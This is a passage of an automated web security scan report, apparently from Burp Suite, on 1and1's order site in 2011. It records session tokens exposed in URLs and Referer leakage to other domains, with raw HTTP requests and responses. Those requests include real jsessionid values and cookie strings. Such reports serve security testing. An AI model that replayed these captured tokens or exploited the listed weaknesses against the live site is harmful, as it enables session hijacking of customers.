Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:23 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupPayPalInfo?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.114. http://order.1and1.com/xml/order/popupServerOsCds  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsCds

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupServerOsCds;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:50:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsCds?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.115. http://order.1and1.com/xml/order/popupServerOsVps  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsVps

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupServerOsVps;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:51:30 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsVps?__frame=_top&__lf=Order-Tariff
Content-Length: 0
Connection: close
Content-Type: text/plain


3.116. http://order.1and1.com/xml/order/popupTcGoogleAdwords  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupTcGoogleAdwords

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupTcGoogleAdwords;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:46:33 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupTcGoogleAdwords?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.117. http://order.1and1.com/xml/order/popupWebsiteMagazine  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/popupWebsiteMagazine

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/popupWebsiteMagazine;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:35:53 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupWebsiteMagazine?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.118. http://order.1and1.com/xml/order/sitedesign  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/sitedesign

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/sitedesign;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 20 Mar 2011 18:34:54 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/sitedesign?__frame=_top&__lf=Static
Content-Length: 0
Connection: close
Content-Type: text/plain


3.119. http://order.1and1.com/xml/order/tariffselect  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-beginner-package-bundle HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Home; ucuo=20110320183705-002.TCpfix141a; lastpage=Hosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:7:AAABLtRYEq4lKh04bfPXut2iW59Fdwxl:1300642665134; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 17:37:27 GMT
Server: Apache
Location: http://order.1and1.com:80/xml/order/domaincheck;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642647822&__frame=_top&__lf=Static
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=UaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 20:51:34 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 0


3.120. http://order.1and1.com/xml/webservice/VDSPriceService  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/webservice/VDSPriceService

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /xml/webservice/VDSPriceService;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains
Origin: http://order.1and1.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: text/plain
wstype: jsonws
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC4uLSspKy4=
Content-Length: 57

{"method":"getVDSPrice","params":[1,1,100,"vdslinuxset"]}

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:59 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/plain;charset=utf-8
Content-Length: 249

{"result":{"errorMessage":null,"priceBrutto":{},"price":{},"error":false,"priceStringBrutto":"49.99","errorCode":null,"campaignPriceBrutto":{},"campaignPriceString":"0.00","campaignPriceStringBrutto":
...[SNIP]...

4. Cross-domain Referer leakage  previous  next
There are 18 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


4.1. http://order.1and1.com/xml/order/CloudDynamicServer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/CloudDynamicServer

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/CloudDynamicServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=MsHosting&linkId=hd.nav.domains HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/MsHosting;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Static&linkOrigin=Mail&linkId=hd.nav.mail
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=Hosting; ucuo=20110320183236-002.TCpfix141a; lastpage=MsHosting; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=CY1goK0M5YmJiXG9lbDJqZDEjLWZZUytCNS8XMi8vLiwuLCkpLCslKCwfISAfHEEvW1Bpdy8xLFw1X240JygkIygkIiUjHSUcGztzdDovNmZvNSgpJSQpJiQkIyEfISQ=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:28:AAABLtRlv0buZKhKd4Brz4n6cVt6806K:1300643561286; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:22 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Nb2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1MjAwLy0rLTA=; Expires=Fri, 07-Apr-2079 21:07:29 GMT; Path=/
ETag: 9efbb6be51ecd3a77db1d7f5b7bc91f5
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 63287


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng" id="vds-price-default-img" width="58" height="44" src="//img.1und1.de/OdinPrice/grey/m/none/0/50/dollar/month.png" alt="from 0,50 &#8364;/month*"><span class="horz-l-price-reg">
...[SNIP]...
<span class="dcs-price"><img class="price-graphic alphapng" id="vds-price" width="121" height="83" src="//img.1und1.de/OdinPrice/blue/xl/dollar/0/00/none/month-star.png" alt="from 0,00 &#8364;/month*"></span>
...[SNIP]...

4.2. http://order.1and1.com/xml/order/Eshops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Eshops

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:33:36 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=bZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyQnIiUmHyA=; Expires=Fri, 07-Apr-2079 21:47:43 GMT; Path=/
ETag: 864e2e4f35ed6ab3549b3f5dceba36dd
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 64223


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="47" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="47" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="75" height="46" src="//img.1und1.de/OdinPrice/yellow/m/dollar/0/00/none/month-star.png" alt="$ 0.00/month"><span class="itable-price-text-below-offer">
...[SNIP]...

4.3. http://order.1and1.com/xml/order/FeatureSite-buildingMap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSite-buildingMap

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:43:37 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:57:44 GMT; Path=/
ETag: 645ffb56b5336d5e93c4fb610365ea26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18055


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</h3><img src="http://www.wsm-demoversion.com/tinc?key=jwW6a5W7" alt="map headquarters"><br>
...[SNIP]...

4.4. http://order.1and1.com/xml/order/Home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Home

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 14:50:52 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=6aV4uMTIoUVFRS3VrcjhwajcpM2xfWTFIOzUdIR4eHRsdMi8vMjErLjIlJyYlIkc1YVZYZh4gG0s7ZXQ6LS4qKS4qKCspIysiISpiYykcJWx1Oy4vKyovKyksKiQsIyI=; Expires=Fri, 07-Apr-2079 18:04:59 GMT; Path=/
ETag: ad36f49218ed966c510ceb30c0b54c6f
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 36434


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
</span><img class="price-graphic alphapng alphapng" width="69" height="44" src="//img.1und1.de/OdinPrice/blue/m/dollar/0/99/none/month-star.png" alt="$ 0.99"></span>
